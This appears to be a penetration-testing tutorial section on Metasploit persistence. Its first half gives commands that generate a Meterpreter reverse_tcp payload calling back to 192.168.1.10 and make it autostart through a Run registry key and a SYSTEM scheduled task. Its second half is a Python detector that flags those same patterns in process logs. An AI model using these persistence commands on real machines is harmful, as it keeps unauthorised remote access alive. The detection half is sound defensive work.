
17. Metasploit Persistence

Persistence ensures you retain access to the compromised machine after a reboot or loss of session.

A. Meterpreter Persistence Module

Run the following in Meterpreter:

    run persistence -U -i 10 -p 4444 -r 192.168.1.10

  • -U: Start on user logon.
  • -i 10: Retry interval in seconds.
  • -p 4444: Port to connect to.
  • -r 192.168.1.10: Remote IP.

B. Windows Registry Key

Add a payload to the registry:

  1. Generate payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o payload.exe
    
  2. Add to registry via PowerShell:

    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "C:\path\to\payload.exe"
    

C. Scheduled Task

Create a task to execute the payload:

    schtasks /create /tn "Updater" /tr "C:\path\to\payload.exe" /sc onlogon /ru SYSTEM
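
Seen from the defender's side, the registry step (B) and the scheduled task (C) each leave a recognisable process command line. The following is an added example, not part of the original page: it flags both patterns in process-creation command lines such as those recorded by Windows Security event 4688 or Sysmon event 1. The sample lines are constructed, and the function and rule names are hypothetical.

```python
import re

# Autorun keys written by the registry step in section B (Run and RunOnce).
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\b", re.I)
REG_WRITER = re.compile(r"\b(Set-ItemProperty|New-ItemProperty|reg(\.exe)?\s+add)\b", re.I)
# A schtasks switch followed by a quoted or bare value, e.g. /tn "Updater".
SWITCH = re.compile(r'/(\w+)\s+(?:"([^"]*)"|([^\s/]\S*))')

SAMPLE = [  # constructed command lines, modelled on the commands shown on this page
    r'powershell.exe Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "C:\path\to\payload.exe"',
    r'schtasks /create /tn "Updater" /tr "C:\path\to\payload.exe" /sc onlogon /ru SYSTEM',
    r'schtasks /query /fo LIST',
    r'powershell.exe Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"',
]

def schtasks_args(cmdline):
    """Return {switch: value} for a schtasks command line (keys lower-cased)."""
    return {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
            for m in SWITCH.finditer(cmdline)}

def classify(cmdline):
    """Return a list of (rule, detail) findings for one process command line."""
    findings = []
    # Rule 1: a registry-writing command that targets an autorun key.
    if RUN_KEY.search(cmdline) and REG_WRITER.search(cmdline):
        findings.append(("run-key-write", cmdline.strip()))
    # Rule 2: a scheduled task created with a logon or boot trigger.
    if re.search(r"\bschtasks(\.exe)?\b", cmdline, re.I) and re.search(r"/create\b", cmdline, re.I):
        args = schtasks_args(cmdline)
        trigger = (args.get("sc") or "").lower()
        if trigger in ("onlogon", "onstart"):
            as_system = (args.get("ru") or "").lower() in ("system", r"nt authority\system")
            rule = "task-autostart-as-system" if as_system else "task-autostart"
            findings.append((rule, f"task={args.get('tn')} runs={args.get('tr')}"))
    return findings

def scan(lines):
    """Return (line_number, rule, detail) for every finding across the input lines."""
    return [(n, rule, detail) for n, line in enumerate(lines, 1)
            for rule, detail in classify(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Read-only commands such as `schtasks /query` or `Get-ItemProperty` on the same key are not flagged, which keeps routine administration out of the results.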